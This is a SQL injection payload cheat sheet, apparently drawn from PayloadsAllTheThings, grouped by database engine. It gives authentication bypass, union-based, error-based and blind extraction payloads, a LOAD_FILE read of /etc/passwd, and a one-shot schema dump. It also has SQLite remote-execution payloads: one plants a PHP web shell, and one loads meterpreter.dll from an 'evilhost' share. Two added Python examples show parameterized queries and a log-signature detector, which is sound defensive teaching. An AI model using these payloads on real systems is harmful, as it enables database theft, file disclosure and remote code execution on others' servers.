# SQL injection

A SQL injection attack consists of the insertion or "injection" of a SQL query via the input data sent from the client to the application. The payloads below are grouped by database engine and technique.

## Authentication bypass and Entry point detection

Detection of an SQL injection entry point:

```
" / %22
; / %3B
' ' DERP
```

Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (").
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (').

Authentication bypass: use the file "Authentication Bypass.txt".

```sql
SELECT id FROM users WHERE username='input1' AND password='input2'
SELECT id FROM users WHERE username='' or true-- AND password='input2'
```
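As an added example (not part of PayloadsAllTheThings), the authentication query above is run against a constructed in-memory SQLite table, first built by string concatenation and then with bound parameters, to show why the bypass works and what closes it; `setup_db`, `login_vulnerable` and `login_safe` are names chosen here.

```python
import sqlite3


def setup_db():
    """Constructed sample data: a single user row (a real system stores password hashes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string formatting: the quote in the input closes the literal and
    the rest of the input becomes SQL, so ' or true-- turns the WHERE clause into
    username='' or true and comments out the password check."""
    query = (f"SELECT id FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the driver passes the input as data, so the
    payload is compared literally against the username column and matches nothing."""
    query = "SELECT id FROM users WHERE username=? AND password=?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = setup_db()
    print(login_vulnerable(db, "' or true--", "anything"))  # 1: check bypassed
    print(login_safe(db, "' or true--", "anything"))        # None: rejected
```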

## MySQL Union Based

```sql
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
```

## MySQL Error Based - Basic

```sql
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
```

## MySQL Error Based - UpdateXML function

```sql
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)--
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)--
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
```

## MySQL Error Based - Extractvalue function

```sql
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
```

## MySQL Blind with MAKE_SET

```sql
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
```

## MySQL Time Based

## MySQL Read content of a file

```sql
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
```

## MySQL DIOS - Dump in One Shot

```sql
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
```

## PostgreSQL Error Based - Basic

## SQLite

### Remote Command Execution using SQLite command - Attach Database

```sql
ATTACH DATABASE /var/www/lol.php AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES (<?system($_GET[cmd]); ?>);--
```

### Remote Command Execution using SQLite command - Load_extension

```sql
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
```

Note: `load_extension` is disabled by default in SQLite.

## Other useful payloads

### Polyglot injection (multicontext)

```sql
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
```
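The payload families above (union with `information_schema`, `updatexml`/`extractvalue`, `MAKE_SET`, `LOAD_FILE`, the `SLEEP` polyglot) share recognisable tokens once the request is URL-decoded. This added example (not from PayloadsAllTheThings) scans constructed access-log lines for them; the signature names, `decode`, `classify` and `scan_log` are choices made here, and the matching is case-insensitive because the mixed-case `UniOn SeLect` spelling on this page is written to defeat naive filters.

```python
import re
from urllib.parse import unquote_plus
# Signature families taken from the payloads on this page; names chosen here.
SIGNATURES = {
    "union-select":   r"union\s+(all\s+)?select",
    "schema-probe":   r"information_schema\.",
    "error-based":    r"\b(updatexml|extractvalue)\s*\(",
    "blind-make-set": r"\bmake_set\s*\(",
    "file-read":      r"\bload_file\s*\(",
    "time-based":     r"\bsleep\s*\(",
}
_COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in SIGNATURES.items()}

# Request line of a combined-format access log: method, path with query string, status.
_LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def decode(value, rounds=2):
    """URL-decode repeatedly: payloads arrive as +, %27, %22 and may be double-encoded."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(query_string):
    """Return the sorted names of the signature families found in a decoded query string."""
    decoded = decode(query_string)
    return sorted(name for name, rx in _COMPILED.items() if rx.search(decoded))

def scan_log(lines):
    """Return (path, families) for each request whose query string trips a signature."""
    hits = []
    for line in lines:
        m = _LOG_RE.search(line)
        if not m or "?" not in m.group("path"):
            continue
        families = classify(m.group("path").split("?", 1)[1])
        if families:
            hits.append((m.group("path"), families))
    return hits

# Constructed sample log lines (not real traffic); the payloads are the ones listed above.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Oct/2016:06:39:17 +0000] "GET /item?id=1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [18/Oct/2016:06:39:18 +0000] "GET /item?id=1+UniOn+Select+1,2,gRoUp_cOncaT(schema_name)+fRoM+information_schema.schemata HTTP/1.1" 500 93',
    '10.0.0.7 - - [18/Oct/2016:06:39:19 +0000] "GET /item?id=1%20AND%20updatexml(rand(),concat(0x3a,version()),null)-- HTTP/1.1" 500 93',
    '10.0.0.9 - - [18/Oct/2016:06:39:20 +0000] "GET /search?q=%27%20UNION%20ALL%20SELECT%20LOAD_FILE(%27/etc/passwd%27)%20-- HTTP/1.1" 200 40',
]
```

Running `scan_log(SAMPLE_LOG)` flags the last three requests and leaves the plain `id=1` request alone; the `time-based` family is what the polyglot above trips.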

## Thanks to - Other resources

* MySQL:
  - PentestMonkey's mySQL injection cheat sheet
  - Reiners mySQL injection Filter Evasion Cheatsheet
  - EvilSQL's Error/Union/Blind MSSQL Cheatsheet
  - PentestMonkey's MSSQL SQLi injection Cheat Sheet
  - PentestMonkey's Oracle SQLi Cheatsheet
  - PentestMonkey's Postgres SQLi Cheatsheet
* Others:
  - Access SQLi Cheatsheet
  - PentestMonkey's Ingres SQL Injection Cheat Sheet
  - Pentestmonkey's DB2 SQL Injection Cheat Sheet
  - Pentestmonkey's Informix SQL Injection Cheat Sheet
  - SQLite3 Injection Cheat sheet
  - Ruby on Rails (Active Record) SQL Injection Guide